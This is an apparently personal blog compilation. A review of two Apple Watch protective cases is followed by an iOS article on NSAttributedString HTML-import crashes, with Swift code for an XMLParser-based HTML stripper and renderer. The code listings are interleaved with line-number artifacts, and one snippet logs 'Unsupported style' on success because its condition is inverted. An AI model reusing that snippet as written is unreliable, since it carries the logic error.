As a clumsy person with OCD, using a delicate product like the Apple Watch is very troublesome; due to my clumsiness, it’s easy to accidentally bump it, and with OCD, any scratches make me very uncomfortable. So, I immediately applied a full-coverage screen protector to prevent accidents.
But actually, just applying a full-coverage screen protector is not enough. The watch itself is curved, and the edges of the protector are fragile, easily chipping if the frame is accidentally rubbed:
Full-coverage screen protector chipping without a case
I am already on my third full-coverage screen protector; although the watch screen itself is undamaged, it still hurts. Perfect fit + no impact on touch + thin + high transparency + no edge lifting = very expensive ($990/piece). The money spent on protectors is almost enough to upgrade to the stainless steel version. Therefore, the Apple Watch case is very important to me, as it enhances the protection of the frame and reduces the risk of damage from bumps.
This article will unbox two Apple Watch cases and compare their experiences, functionality, appearance, and suitable scenarios. Let’s get started!
Left: Muvit Case / Right: Catalyst Case (with strap)
p.s. My watch model is: Apple Watch Series 4 (GPS + Cellular), 44mm Space Gray Aluminum Case with Black Sport Band
This case features an integrated design with a strap, providing comprehensive protection from wear to impact and water resistance.
Front of the box
100 meters waterproof / 360° full protection / 2 meters drop protection
Back of the box
IP-68 waterproof rating, each product tested at a depth of 100 meters, U.S. military-grade impact protection, direct screen operation, original sound quality for calls, can charge through the case, can detect heart rate through the case.
IP-68 ( Wiki ):
6 - Completely dustproof, no dust can enter, completely prevents contact.
8 - Immersion in water beyond 1m.
Contents
In addition to the Catalyst Apple Watch case (with a model inside), it comes with a small screwdriver for easy installation.
Protective Case (Including Strap) Body
Protective Case (Including Strap) Body Back
Comparison with Original Sport Band (L) (Left: Catalyst/Right: Original)
Fixed Ring Buckle
The length is similar to the original sport band (L) but with denser holes, allowing for a more adjustable fit to the wrist size; the fixed ring has a buckle to ensure it does not fall off during intense exercise.
We need to disassemble the Catalyst case first, then place the Apple Watch body inside and reassemble it.
Exploded View (Taken from Official Website)
Flip to the back and press the rectangular buckle with your fingernail, then push left or right!
When installing, make sure the waterproof case is properly fitted without wrinkles to avoid affecting waterproof performance.
Similarly, ensure there are no wrinkles to avoid affecting waterproof performance.
Snap back the body and screw it back ( Please do not over-tighten the screws! )
Test result: No problem, does not affect charging speed.
Left: With Case/Right: Bare Device
Test result: No problem, does not affect heart rate detection.
Apple Watch 4 full-screen display is unobstructed, no problem ✅
Can be used normally ✅
No significant differences ✅
Due to my large hands, I originally bought the largest 44mm version of the watch. After adding the protective case, it looks even more rugged and grand.
This watch strap truly provides 360° comprehensive protection and enhances its waterproof function to adapt to more challenging environments.
The strap is made of skin-friendly material, making it feel no different from the original sports strap. However, the adjustment part of the strap has denser holes, allowing for a more suitable size (the original strap either felt too loose or too tight for me). The buckle on the fixing ring also gives me more peace of mind as someone with OCD!
The overall appearance is wild and rugged, making it perfect for outdoor activities, hiking, rock climbing, and diving. These are also the scenarios where this strap can provide the maximum protective effect!
Remember to bring sunglasses next time, the sun is super bright
Catalyst family photo ( AirPods case )
The second product I tried is the Muvit Apple Watch Protective Case. Compared to the professional protection of Catalyst, this one is simpler and more convenient, suitable for various daily life scenarios. Despite this, Muvit still passed the U.S. military standard MIL-STD 810G 3-meter drop test, ensuring safety and protection!
Front of the box
Two different color protective cases: Left - Black / Right - Light Purple
U.S. military standard MIL-STD 810G 3-meter drop test, extremely light 2.3G
Back of the box
Dual-layer structure protection, silicone shock-absorbing layer, polycarbonate buffering system, screen frame protection
Contents
Protective case body, black/light purple
Flip to the back and press the rectangular buckle with your fingernail, then push left or right!
Black version
Light purple version
Try-on, left: black / right: light purple
Digital Crown:
Works normally ✅. Other functions like audio, heart rate, display, etc., are not affected as this is just a frame protective case, so no special tests are needed!
The most satisfying aspect of using this protective case is that I can quickly and conveniently switch straps according to different life scenarios (leather strap for suits, sports strap for daily use). It’s easy to install and remove, and its protection is sufficient for all daily scenarios (housework, cleaning, moving things). Currently, I use this protective case for my daily life.
Paired with a leather strap
It has been over 4 months from receiving the trial to writing this article. During this period, I moved houses (Sorry… the scenes in this article are messy), participated in a duathlon (10KM running + 40KM cycling), and went diving in Malaysia. These two protective cases have accompanied me through various activities, and the full-coverage screen protector is still perfect!
Remember how many screen protectors I changed? The answer is 3 in 3 months, averaging less than a month before they somehow got damaged and chipped. Each one costs $990 Orz
I can only say it’s a regret meeting late. If I had known about protective cases earlier, I wouldn’t have wasted so much money!
Both Catalyst and Muvit have solved my problem of constantly chipping screen protectors. If you don’t use a screen protector, you should definitely get a protective case to protect the screen edges; otherwise, a cracked screen will hurt even more.
For recommendations, if you often engage in intense sports (rock climbing, diving) or labor work, I suggest choosing Catalyst for better peace of mind. If you’re just an office worker, occasionally run, and like to change watch bands according to your mood, then Muvit is sufficient!
Here is a simple comparison table for your reference:
From the first complete unboxing to three months of use, it’s been almost a year since I’ve been wearing my Apple Watch S4. There haven’t been many changes in usage; third-party apps are still scarce, and the most frequently used features are still Apple Pay, unlocking the Mac, and checking notifications. The Apple Watch has integrated into my daily life, and I’ve gotten used to its convenience.
By the way, let’s look forward to Watch OS 6 together :)
In the past six months, I’ve been more diligent in utilizing the Apple Watch’s fitness features, recording running and cycling times, routes, and heart rates. Besides recording, the awards make exercising more goal-oriented and fulfilling. Competing with friends or sharing results on social media makes exercising fun and easier to maintain!
Awards, Competitions, Exercise Routes, Exercise Status
Special thanks to Men’s Game for providing the Apple Watch Series 4 protective case for testing.
Check out »> AirPods 2 Unboxing and Hands-On Experience
For any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
An alternative to iOS NSAttributedString DocumentType.html
Photo by Florian Olivo
Re-developed using another method 「 ZMarkupParser HTML String to NSAttributedString Tool 」 , for technical details and development stories, please visit 「 The Story of Handcrafting an HTML Parser 」
Since the release of iOS 15 last year, the app has been plagued by a crash issue that has topped the charts for a long time. According to the data, in the past 90 days (2022/03/11~2022/06/08), it caused over 2.4K crashes, affecting over 1.4K users.
From the data, it appears that this massive crash issue has been fixed (or the occurrence rate has been reduced) in subsequent versions of iOS ≥ 15.2, as the trend is showing a decline.
Most affected versions: iOS 15.0.X ~ iOS 15.X.X
Additionally, there were sporadic crashes found in iOS 12 and iOS 13, indicating that this issue has existed for a long time, but the occurrence rate in the early versions of iOS 15 was almost 100%.
1
+
<compiler-generated> line 2147483647 specialized @nonobjc NSAttributedString.init(data:options:documentAttributes:)
+
NSAttributedString crashes during init with Crashed: com.apple.main-thread EXC_BREAKPOINT 0x00000001de9d4e44
.
It is also possible that the operation was not on the Main Thread.
When this issue first appeared massively, it puzzled the development team; re-testing the crash points in the Crash Log showed no problems, and it was unclear under what circumstances the users encountered the issue. Until one day, by chance, I switched to “Low Power Mode” and triggered the issue! WTF!!!
After some searching, I found many similar cases online and also found the earliest similar crash issue question on the App Developer Forums, with an official response:
Rendering constraints means limiting the rendering formats that the app can support, such as only supporting bold, italic, hyperlinks.
You can coordinate with the backend to create an interface:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+
{
+ "content":[
+ {"type":"text","value":"Paragraph 1 plain text"},
+ {"type":"text","value":"Paragraph 2 plain text"},
+ {"type":"text","value":"Paragraph 3 plain text"},
+ {"type":"text","value":"Paragraph 4 plain text"},
+ {"type":"image","src":"https://zhgchg.li/logo.png","title":"ZhgChgLi"},
+ {"type":"text","value":"Paragraph 5 plain text"}
+ ]
+}
+
You can combine it with Markdown to support text rendering, or refer to Medium’s approach:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+
"Paragraph": {
+ "text": "code in text, and link in text, and ZhgChgLi, and bold, and I, only i",
+ "markups": [
+ {
+ "type": "CODE",
+ "start": 5,
+ "end": 7
+ },
+ {
+ "start": 18,
+ "end": 22,
+ "href": "http://zhgchg.li",
+ "type": "LINK"
+ },
+ {
+ "type": "STRONG",
+ "start": 50,
+ "end": 63
+ },
+ {
+ "type": "EM",
+ "start": 55,
+ "end": 69
+ }
+ ]
+}
+
This means that for the text code in text, and link in text, and ZhgChgLi, and bold, and I, only i
:
1
+2
+3
+4
+
- Characters 5 to 7 should be marked as code (wrapped in `Text` format)
+- Characters 18 to 22 should be marked as a link (wrapped in [Text](URL) format)
+- Characters 50 to 63 should be marked as bold (wrapped in *Text* format)
+- Characters 55 to 69 should be marked as italic (wrapped in _Text_ format)
+
With a standardized and describable structure, the app can use native methods to render, achieving optimal performance and user experience.
For the pitfalls of using UITextView for text wrapping, you can refer to my previous article: iOS UITextView Text Wrapping Editor (Swift)
Before implementing the solution, let’s first explore the problem itself. Personally, I believe the main cause of this issue is not from Apple; the official bug is just the trigger point.
The main problem comes from treating the app as a web renderer. The advantage is that web development is fast, the same API endpoint can provide HTML to all clients without distinction, and it can flexibly render any content. The disadvantage is that HTML is not a common interface for apps, you can’t expect app engineers to understand HTML, performance is extremely poor, it can only run on the main thread, the development stage cannot predict the result, and it is difficult to confirm the supported specifications.
Looking further into the problem, it often stems from unclear original requirements, uncertainty about which specifications the app needs to support, and the pursuit of speed, leading to the direct use of HTML as the interface between the app and the web.
Supplementing the performance part, actual tests show that directly using NSAttributedString DocumentType.html
and implementing the rendering method yourself has a speed difference of 5 to 20 times.
Since it is for App use, a better approach should be based on App development methods. For Apps, the cost of adjusting requirements is much higher than for the Web; effective App development should be based on iterative adjustments with specifications. At the moment, we need to confirm the specifications that can be supported. If we need to change them later, we will schedule time to expand the specifications. We cannot quickly change them as we wish, which can reduce communication costs and increase work efficiency.
<b>/<i>/<a>/<u>
, and it must be explicitly informed to the developers in the program)Updated approach, no longer using XMLParser, due to zero tolerance for errors:
<br>
/ <Congratulation!>
/ <b>Bold<i>Bold+Italic</b>Italic</i>
The above three possible scenarios will all cause XMLParser to throw an error and display blank. Using XMLParser, the HTML string must fully comply with XML rules, unlike browsers or NSAttributedString.DocumentType.html which can tolerate errors and display normally.
Switch to pure Swift development, parsing HTML tags through Regex and Tokenization, analyzing and correcting tag correctness (correcting tags without end & misplaced tags), then converting them into an abstract syntax tree, and finally using the Visitor Pattern to map HTML tags to abstract styles, obtaining the final NSAttributedString result; without relying on any Parser Lib.
— —
The die is cast, back to the main topic. Currently, we are using HTML to render NSAttributedString
, so how do we solve the above crash and performance issues?
Before talking about HTML Render, let’s talk about Strip HTML again. As mentioned in the Why?
section, where the App will get HTML and what kind of HTML it will get should be specified in the specifications; rather than the App “ possibly “ getting HTML and needing to strip it.
As a former supervisor said: Isn’t this too crazy?
1
+2
+3
+
let data = "<div>Text</div>".data(using: .unicode)!
+let attributed = try NSAttributedString(data: data, options: [.documentType: NSAttributedString.DocumentType.html, .characterEncoding: String.Encoding.utf8.rawValue], documentAttributes: nil)
+let string = attributed.string
+
1
+2
+
htmlString = "<div>Test</div>"
+htmlString.replacingOccurrences(of: "<[^>]+>", with: "", options: .regularExpression, range: nil)
+
<p foo=">now what?">Paragraph</p>
is valid HTML but will be stripped incorrectlyRefer to the approach of SwiftRichString, using XMLParser from Foundation to parse HTML as XML and implement HTML Parser & Strip functionality.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+
import UIKit
+// Ref: https://github.com/malcommac/SwiftRichString
+final class HTMLStripper: NSObject, XMLParserDelegate {
+
+ private static let topTag = "source"
+ private var xmlParser: XMLParser
+
+ private(set) var storedString: String
+
+ // The XML parser sometimes splits strings, which can break localization-sensitive
+ // string transforms. Work around this by using the currentString variable to
+ // accumulate partial strings, and then reading them back out as a single string
+ // when the current element ends, or when a new one is started.
+ private var currentString: String?
+
+ // MARK: - Initialization
+
+ init(string: String) throws {
+ let xmlString = HTMLStripper.escapeWithUnicodeEntities(string)
+ let xml = "<\(HTMLStripper.topTag)>\(xmlString)</\(HTMLStripper.topTag)>"
+ guard let data = xml.data(using: String.Encoding.utf8) else {
+ throw XMLParserInitError("Unable to convert to UTF8")
+ }
+
+ self.xmlParser = XMLParser(data: data)
+ self.storedString = ""
+
+ super.init()
+
+ xmlParser.shouldProcessNamespaces = false
+ xmlParser.shouldReportNamespacePrefixes = false
+ xmlParser.shouldResolveExternalEntities = false
+ xmlParser.delegate = self
+ }
+
+ /// Parse and generate attributed string.
+ func parse() throws -> String {
+ guard xmlParser.parse() else {
+ let line = xmlParser.lineNumber
+ let shiftColumn = (line == 1)
+ let shiftSize = HTMLStripper.topTag.lengthOfBytes(using: String.Encoding.utf8) + 2
+ let column = xmlParser.columnNumber - (shiftColumn ? shiftSize : 0)
+
+ throw XMLParserError(parserError: xmlParser.parserError, line: line, column: column)
+ }
+
+ return storedString
+ }
+
+ // MARK: XMLParserDelegate
+
+ @objc func parser(_ parser: XMLParser, didStartElement elementName: String, namespaceURI: String?, qualifiedName qName: String?, attributes attributeDict: [String: String]) {
+ foundNewString()
+ }
+
+ @objc func parser(_ parser: XMLParser, didEndElement elementName: String, namespaceURI: String?, qualifiedName qName: String?) {
+ foundNewString()
+ }
+
+ @objc func parser(_ parser: XMLParser, foundCharacters string: String) {
+ currentString = (currentString ?? "").appending(string)
+ }
+
+ // MARK: Support Private Methods
+
+ func foundNewString() {
+ if let currentString = currentString {
+ storedString.append(currentString)
+ self.currentString = nil
+ }
+ }
+
+ // handle html entity / html hex
+ // Perform string escaping to replace all characters which is not supported by NSXMLParser
+ // into the specified encoding with decimal entity.
+ // For example if your string contains '&' character parser will break the style.
+ // This option is active by default.
+ // ref: https://github.com/malcommac/SwiftRichString/blob/e0b72d5c96968d7802856d2be096202c9798e8d1/Sources/SwiftRichString/Support/XMLStringBuilder.swift
+ static func escapeWithUnicodeEntities(_ string: String) -> String {
+ guard let escapeAmpRegExp = try? NSRegularExpression(pattern: "&(?!(#[0-9]{2,4}|[A-z]{2,6});)", options: NSRegularExpression.Options(rawValue: 0)) else {
+ return string
+ }
+
+ let range = NSRange(location: 0, length: string.count)
+ return escapeAmpRegExp.stringByReplacingMatches(in: string,
+ options: NSRegularExpression.MatchingOptions(rawValue: 0),
+ range: range,
+ withTemplate: "&")
+ }
+}
+
+
+let test = "我<br/><a href=\"http://google.com\">同意</a>提供<b><i>個</i>人</b>身分證字號/護照/居留<span style=\"color:#FF0000;font-size:20px;word-spacing:10px;line-height:10px\">證號碼</span>,以供<i>跨境物流</i>方通關<span style=\"background-color:#00FF00;\">使用</span>,並已<img src=\"g.png\"/>了解跨境<br/>商品之物<p>流需</p>求"
+
+let stripper = try HTMLStripper(string: test)
+print(try! stripper.parse())
+
+// I agree to provide personal ID number/passport/residence permit number for cross-border logistics customs clearance, and have understood the logistics requirements of cross-border goods.
+
Using Foundation XML Parser to handle String, implement XMLParserDelegate
using currentString
to store String, since String may sometimes be split into multiple Strings, foundCharacters
might be called repeatedly. didStartElement
and didEndElement
are used to find the start and end of the string, storing the current result and clearing currentString
.
g -> g
<br>
should be written as <br/>
Personally, I think Option 2 is a better method for simply stripping HTML. This method is introduced because rendering HTML also uses the same principle. Let’s use this as a simple example :)
Using XMLParser to implement it yourself, following the same principle as stripping, we can add corresponding rendering methods when parsing certain tags.
Requirements:
<a>
Tagstyle
attributes, as HTML will explicitly indicate the style to be displayed in style="color:red"
You can reduce functionality according to your own requirements, for example, if you don’t need to support background color adjustment, you don’t need to open the setting for background color.
This article is just a conceptual implementation, not the best practice in architecture; if you have clear specifications and usage, you can consider applying some Design Patterns to achieve good maintainability and extensibility.
Again, if your App is new or has the opportunity to switch entirely to Markdown format, it is recommended to adopt the above method. Writing your own renderer is too complex and will not perform better than Markdown.
Even if you are on iOS < 15 and do not support native Markdown, you can still find a great Markdown Parser solution on Github.
1
+2
+3
+4
+5
+6
+7
+
protocol HTMLTagParser {
+ static var tag: String { get } // Declare the Tag Name to be parsed, e.g. a
+ var storedHTMLAttributes: [String: String]? { get set } // The parsed attributes will be stored here, e.g. href, style
+ var style: AttributedStringStyle? { get } // The style to be applied to this Tag
+
+ func render(attributedString: inout NSMutableAttributedString) // Implement the logic to render HTML to attributedString
+}
+
Declare the analyzable HTML Tag entity for easy extension and management.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+
protocol AttributedStringStyle {
+ var font: UIFont? { get set }
+ var color: UIColor? { get set }
+ var backgroundColor: UIColor? { get set }
+ var wordSpacing: CGFloat? { get set }
+ var paragraphStyle: NSParagraphStyle? { get set }
+ var customs: [NSAttributedString.Key: Any]? { get set } // Universal setting, it is recommended to abstract it out after confirming the supported specifications and close this opening
+ func render(attributedString: inout NSMutableAttributedString)
+}
+
+// abstract implement
+extension AttributedStringStyle {
+ func render(attributedString: inout NSMutableAttributedString) {
+ let range = NSMakeRange(0, attributedString.length)
+ if let font = font {
+ attributedString.addAttribute(NSAttributedString.Key.font, value: font, range: range)
+ }
+ if let color = color {
+ attributedString.addAttribute(NSAttributedString.Key.foregroundColor, value: color, range: range)
+ }
+ if let backgroundColor = backgroundColor {
+ attributedString.addAttribute(NSAttributedString.Key.backgroundColor, value: backgroundColor, range: range)
+ }
+ if let wordSpacing = wordSpacing {
+ attributedString.addAttribute(NSAttributedString.Key.kern, value: wordSpacing as Any, range: range)
+ }
+ if let paragraphStyle = paragraphStyle {
+ attributedString.addAttribute(NSAttributedString.Key.paragraphStyle, value: paragraphStyle, range: range)
+ }
+ if let customAttributes = customs {
+ attributedString.addAttributes(customAttributes, range: range)
+ }
+ }
+}
+
Declare the styles that can be set for the Tag.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+
// only support tag attributed down below
+// can set color,font size,line height,word spacing,background color
+
+enum HTMLStyleAttributedParser: String {
+ case color = "color"
+ case fontSize = "font-size"
+ case lineHeight = "line-height"
+ case wordSpacing = "word-spacing"
+ case backgroundColor = "background-color"
+
+ func render(attributedString: inout NSMutableAttributedString, value: String) -> Bool {
+ let range = NSMakeRange(0, attributedString.length)
+ switch self {
+ case .color:
+ if let color = convertToiOSColor(value) {
+ attributedString.addAttribute(NSAttributedString.Key.foregroundColor, value: color, range: range)
+ return true
+ }
+ case .backgroundColor:
+ if let color = convertToiOSColor(value) {
+ attributedString.addAttribute(NSAttributedString.Key.backgroundColor, value: color, range: range)
+ return true
+ }
+ case .fontSize:
+ if let size = convertToiOSSize(value) {
+ attributedString.addAttribute(NSAttributedString.Key.font, value: UIFont.systemFont(ofSize: CGFloat(size)), range: range)
+ return true
+ }
+ case .lineHeight:
+ if let size = convertToiOSSize(value) {
+ let paragraphStyle = NSMutableParagraphStyle()
+ paragraphStyle.lineSpacing = size
+ attributedString.addAttribute(NSAttributedString.Key.paragraphStyle, value: paragraphStyle, range: range)
+ return true
+ }
+ case .wordSpacing:
+ if let size = convertToiOSSize(value) {
+ attributedString.addAttribute(NSAttributedString.Key.kern, value: size, range: range)
+ return true
+ }
+ }
+
+ return false
+ }
+
+ // convert 36px -> 36
+ private func convertToiOSSize(_ string: String) -> CGFloat? {
+ guard let regex = try? NSRegularExpression(pattern: "^([0-9]+)"),
+ let firstMatch = regex.firstMatch(in: string, options: [], range: NSRange(location: 0, length: string.utf16.count)),
+ let range = Range(firstMatch.range, in: string),
+ let size = Float(String(string[range])) else {
+ return nil
+ }
+ return CGFloat(size)
+ }
+
+ // convert html hex color #ffffff to UIKit Color
+ private func convertToiOSColor(_ hexString: String) -> UIColor? {
+ var cString: String = hexString.trimmingCharacters(in: .whitespacesAndNewlines).uppercased()
+
+ if cString.hasPrefix("#") {
+ cString.remove(at: cString.startIndex)
+ }
+
+ if (cString.count) != 6 {
+ return nil
+ }
+
+ var rgbValue: UInt64 = 0
+ Scanner(string: cString).scanHexInt64(&rgbValue)
+
+ return UIColor(
+ red: CGFloat((rgbValue & 0xFF0000) >> 16) / 255.0,
+ green: CGFloat((rgbValue & 0x00FF00) >> 8) / 255.0,
+ blue: CGFloat(rgbValue & 0x0000FF) / 255.0,
+ alpha: CGFloat(1.0)
+ )
+ }
+}
+
Implement Style Attributed Parser to parse style="color:red;font-size:16px"
but CSS Style has many configurable styles, so it is necessary to enumerate the supported range.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+
extension HTMLTagParser {
+
+ func render(attributedString: inout NSMutableAttributedString) {
+ defaultStyleRender(attributedString: &attributedString)
+ }
+
+ func defaultStyleRender(attributedString: inout NSMutableAttributedString) {
+ // setup default style to NSMutableAttributedString
+ style?.render(attributedString: &attributedString)
+
+ // setup & override HTML style (style="color:red;background-color:black") to NSMutableAttributedString if is exists
+ // any html tag can have style attribute
+ if let style = storedHTMLAttributes?["style"] {
+ let styles = style.split(separator: ";").map { $0.split(separator: ":") }.filter { $0.count == 2 }
+ for style in styles {
+ let key = String(style[0])
+ let value = String(style[1])
+
+ if let styleAttributed = HTMLStyleAttributedParser(rawValue: key), styleAttributed.render(attributedString: &attributedString, value: value) {
+ print("Unsupported style attributed or value[\(key):\(value)]")
+ }
+ }
+ }
+ }
+}
+
Apply HTMLStyleAttributedParser & HTMLStyleAttributedParser abstract implementation.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+
struct LinkStyle: AttributedStringStyle {
+ var font: UIFont? = UIFont.systemFont(ofSize: 14)
+ var color: UIColor? = UIColor.blue
+ var backgroundColor: UIColor? = nil
+ var wordSpacing: CGFloat? = nil
+ var paragraphStyle: NSParagraphStyle?
+ var customs: [NSAttributedString.Key: Any]? = [.underlineStyle: NSUnderlineStyle.single.rawValue]
+}
+
+struct ATagParser: HTMLTagParser {
+ // <a></a>
+ static let tag: String = "a"
+ var storedHTMLAttributes: [String: String]? = nil
+ let style: AttributedStringStyle? = LinkStyle()
+
+ func render(attributedString: inout NSMutableAttributedString) {
+ defaultStyleRender(attributedString: &attributedString)
+ if let href = storedHTMLAttributes?["href"], let url = URL(string: href) {
+ let range = NSMakeRange(0, attributedString.length)
+ attributedString.addAttribute(NSAttributedString.Key.link, value: url, range: range)
+ }
+ }
+}
+struct BoldStyle: AttributedStringStyle {
+ var font: UIFont? = UIFont.systemFont(ofSize: 14, weight: .bold)
+ var color: UIColor? = UIColor.black
+ var backgroundColor: UIColor? = nil
+ var wordSpacing: CGFloat? = nil
+ var paragraphStyle: NSParagraphStyle?
+ var customs: [NSAttributedString.Key: Any]? = [.underlineStyle: NSUnderlineStyle.single.rawValue]
+}
+
+struct BoldTagParser: HTMLTagParser {
+ // <b></b>
+ static let tag: String = "b"
+ var storedHTMLAttributes: [String: String]? = nil
+ let style: AttributedStringStyle? = BoldStyle()
+}
+
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118
+119
+120
+121
+122
+123
+124
+125
+126
+127
+128
+129
+130
+131
+132
+133
+134
+135
+136
+137
+138
+139
+140
+141
+142
+143
+144
+145
+146
+147
+148
+149
+150
+151
+152
+153
+154
+155
+156
+157
+158
+159
+160
+161
+
// Ref: https://github.com/malcommac/SwiftRichString
+final class HTMLToAttributedStringParser: NSObject {
+
+ private static let topTag = "source"
+ private var xmlParser: XMLParser?
+
+ private(set) var attributedString: NSMutableAttributedString = NSMutableAttributedString()
+ private(set) var supportedTagRenders: [HTMLTagParser] = []
+ private let defaultStyle: AttributedStringStyle
+
+ /// Styles applied at each fragment.
+ private var renderingTagRenders: [HTMLTagParser] = []
+
+ // The XML parser sometimes splits strings, which can break localization-sensitive
+ // string transforms. Work around this by using the currentString variable to
+ // accumulate partial strings, and then reading them back out as a single string
+ // when the current element ends, or when a new one is started.
+ private var currentString: String?
+
+ // MARK: - Initialization
+
+ init(defaultStyle: AttributedStringStyle) {
+ self.defaultStyle = defaultStyle
+ super.init()
+ }
+
+ func register(_ tagRender: HTMLTagParser) {
+ if let index = supportedTagRenders.firstIndex(where: { type(of: $0).tag == type(of: tagRender).tag }) {
+ supportedTagRenders.remove(at: index)
+ }
+ supportedTagRenders.append(tagRender)
+ }
+
+ /// Parse and generate attributed string.
+ func parse(string: String) throws -> NSAttributedString {
+ var xmlString = HTMLToAttributedStringParser.escapeWithUnicodeEntities(string)
+
+ // make sure <br/> format is correct XML
+ // because Web may use <br> to present <br/>, but <br> is not a valid XML
+ xmlString = xmlString.replacingOccurrences(of: "<br>", with: "<br/>")
+
+ let xml = "<\(HTMLToAttributedStringParser.topTag)>\(xmlString)</\(HTMLToAttributedStringParser.topTag)>"
+ guard let data = xml.data(using: String.Encoding.utf8) else {
+ throw XMLParserInitError("Unable to convert to UTF8")
+ }
+
+ let xmlParser = XMLParser(data: data)
+ xmlParser.shouldProcessNamespaces = false
+ xmlParser.shouldReportNamespacePrefixes = false
+ xmlParser.shouldResolveExternalEntities = false
+ xmlParser.delegate = self
+ self.xmlParser = xmlParser
+
+ attributedString = NSMutableAttributedString()
+
+ guard xmlParser.parse() else {
+ let line = xmlParser.lineNumber
+ let shiftColumn = (line == 1)
+ let shiftSize = HTMLToAttributedStringParser.topTag.lengthOfBytes(using: String.Encoding.utf8) + 2
+ let column = xmlParser.columnNumber - (shiftColumn ? shiftSize : 0)
+
+ throw XMLParserError(parserError: xmlParser.parserError, line: line, column: column)
+ }
+
+ return attributedString
+ }
+}
+
+// MARK: Private Method
+
+private extension HTMLToAttributedStringParser {
+ func enter(element elementName: String, attributes: [String: String]) {
+ // elementName = tagName, EX: a,span,div...
+ guard elementName != HTMLToAttributedStringParser.topTag else {
+ return
+ }
+
+ if let index = supportedTagRenders.firstIndex(where: { type(of: $0).tag == elementName }) {
+ var tagRender = supportedTagRenders[index]
+ tagRender.storedHTMLAttributes = attributes
+ renderingTagRenders.append(tagRender)
+ }
+ }
+
+ func exit(element elementName: String) {
+ if !renderingTagRenders.isEmpty {
+ renderingTagRenders.removeLast()
+ }
+ }
+
+ func foundNewString() {
+ if let currentString = currentString {
+ // currentString != nil ,ex: <i>currentString</i>
+ var newAttributedString = NSMutableAttributedString(string: currentString)
+ if !renderingTagRenders.isEmpty {
+ for (key, tagRender) in renderingTagRenders.enumerated() {
+ // Render Style
+ tagRender.render(attributedString: &newAttributedString)
+ renderingTagRenders[key].storedHTMLAttributes = nil
+ }
+ } else {
+ defaultStyle.render(attributedString: &newAttributedString)
+ }
+ attributedString.append(newAttributedString)
+ self.currentString = nil
+ } else {
+ // currentString == nil ,ex: <br/>
+ var newAttributedString = NSMutableAttributedString()
+ for (key, tagRender) in renderingTagRenders.enumerated() {
+ // Render Style
+ tagRender.render(attributedString: &newAttributedString)
+ renderingTagRenders[key].storedHTMLAttributes = nil
+ }
+ attributedString.append(newAttributedString)
+ }
+ }
+}
+
+// MARK: Helper
+
+extension HTMLToAttributedStringParser {
+ // handle html entity / html hex
+ // Perform string escaping to replace all characters which is not supported by NSXMLParser
+ // into the specified encoding with decimal entity.
+ // For example if your string contains '&' character parser will break the style.
+ // This option is active by default.
+ // ref: https://github.com/malcommac/SwiftRichString/blob/e0b72d5c96968d7802856d2be096202c9798e8d1/Sources/SwiftRichString/Support/XMLStringBuilder.swift
+ static func escapeWithUnicodeEntities(_ string: String) -> String {
+ guard let escapeAmpRegExp = try? NSRegularExpression(pattern: "&(?!(#[0-9]{2,4}|[A-z]{2,6});)", options: NSRegularExpression.Options(rawValue: 0)) else {
+ return string
+ }
+
+ let range = NSRange(location: 0, length: string.count)
+ return escapeAmpRegExp.stringByReplacingMatches(in: string,
+ options: NSRegularExpression.MatchingOptions(rawValue: 0),
+ range: range,
+ withTemplate: "&")
+ }
+}
+
+// MARK: XMLParserDelegate
+
+extension HTMLToAttributedStringParser: XMLParserDelegate {
+ func parser(_ parser: XMLParser, didStartElement elementName: String, namespaceURI: String?, qualifiedName qName: String?, attributes attributeDict: [String: String]) {
+ foundNewString()
+ enter(element: elementName, attributes: attributeDict)
+ }
+
+ func parser(_ parser: XMLParser, didEndElement elementName: String, namespaceURI: String?, qualifiedName qName: String?) {
+ foundNewString()
+ guard elementName != HTMLToAttributedStringParser.topTag else {
+ return
+ }
+
+ exit(element: elementName)
+ }
+
+ func parser(_ parser: XMLParser, foundCharacters string: String) {
+ currentString = (currentString ?? "").appending(string)
+ }
+}
+
